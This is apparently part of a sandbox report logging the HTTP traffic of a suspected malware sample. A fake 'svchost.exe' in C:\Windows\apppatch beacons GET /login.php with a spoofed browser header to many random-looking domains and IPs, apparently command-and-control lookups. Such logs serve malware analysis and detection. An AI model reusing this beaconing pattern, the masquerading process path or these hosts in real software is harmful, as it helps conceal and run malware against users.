Nov 11, 2024 18:13:25.499149084 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Mon, 11 Nov 2024 17:13:25 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49710	85.17.31.82	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:00.893734932 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49711	18.208.156.248	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:00.895742893 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com
Nov 11, 2024 18:13:01.323147058 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49712	154.212.231.82	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:00.951148033 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Nov 11, 2024 18:13:01.832480907 CET	696	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 17:13:01 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:13:01.837670088 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Nov 11, 2024 18:13:02.202214003 CET	696	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 17:13:02 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:13:24.633567095 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Nov 11, 2024 18:13:24.994327068 CET	696	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 17:13:24 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:13:25.060666084 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Nov 11, 2024 18:13:25.409483910 CET	696	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 17:13:25 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	58859	188.114.96.3	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:00.996090889 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Nov 11, 2024 18:13:01.676198959 CET	974	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 11 Nov 2024 17:13:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IHEBZcaG%2FDBjDByF%2F2MMWcH0ycH9yjmr%2BSrebujFi%2BcsSw8E70CYg40mOowfuw5uihc%2BW5YO3j%2BB9ImVgJGOAfgWY6du9owKvqBlS1DRZOqbMgIrSEbyFqgKMJJOPA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fe9179e4d0fa7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1084&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:13:03.097882986 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Nov 11, 2024 18:13:03.442421913 CET	976	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 11 Nov 2024 17:13:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s2Sz6BZbTAUereBuFI%2FGhEUGx9pgSP4RggGdz4ycnyYvStWACOzAur43XCH35J4Z2ID2Ls08zXKjr5RU53STVGpufnewmDuA%2B5H%2FHiB89GmB3xglYuLYavFvCqd43g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fe922abc50fa7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1126&sent=4&recv=6&lost=0&retrans=0&sent_bytes=974&recv_bytes=486&delivery_rate=2227692&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:13:24.762502909 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Nov 11, 2024 18:13:25.107697010 CET	806	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 11 Nov 2024 17:13:25 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fMUfFdv4hfytnfNVJdamOrg3SG12k13SIwUlphZLZ0RN%2FIe8pAjoYyuAdG4oAGk%2F3iPv8snfvUCj8L6cgLzHAZkOmjAnBZdwDnJD2bkXu6G%2BUvtBGI93k%2Fb7OJqFyQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fe9aa1aa40fa7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1296&sent=7&recv=9&lost=0&retrans=0&sent_bytes=1950&recv_bytes=729&delivery_rate=2227692&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 11, 2024 18:13:25.107980013 CET	173	IN	Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:13:26.728569984 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Nov 11, 2024 18:13:27.063139915 CET	808	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 11 Nov 2024 17:13:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zump4GPQlEgVpzChwoTSzGf2uvhEmdH54WAqnTtqJNDdWrnHQ%2BVNNkhP%2BJDvPC9vLglTckJzfz%2Fn%2FZquuNef1JLOTYRuTtzkVxwg3mxzy7BTrbW%2BcW3tBNbkNDrTcQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fe9b659fe0fa7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1245&sent=11&recv=13&lost=0&retrans=0&sent_bytes=2929&recv_bytes=972&delivery_rate=2985567&cwnd=4&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 11, 2024 18:13:27.067162991 CET	173	IN	Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49713	44.221.84.105	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:00.999512911 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com
Nov 11, 2024 18:13:01.419625998 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	58860	199.59.243.227	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:01.126977921 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
Nov 11, 2024 18:13:01.552536964 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 11 Nov 2024 17:13:00 GMT content-type: text/html; charset=utf-8 content-length: 1094 x-request-id: ff4a393e-1a61-4543-92b2-8dd8ca6534da cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ== set-cookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da; expires=Mon, 11 Nov 2024 17:28:01 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Nov 11, 2024 18:13:01.552553892 CET	528	IN	Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZmY0YTM5M2UtMWE2MS00NTQzLTkyYjItOGRkOGNhNjUzNGRhIiwicGFnZV90aW1lIjoxNzMxMzQ1MTgxLCJwYWdlX3VybCI6I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	58861	99.83.170.3	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:01.179976940 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
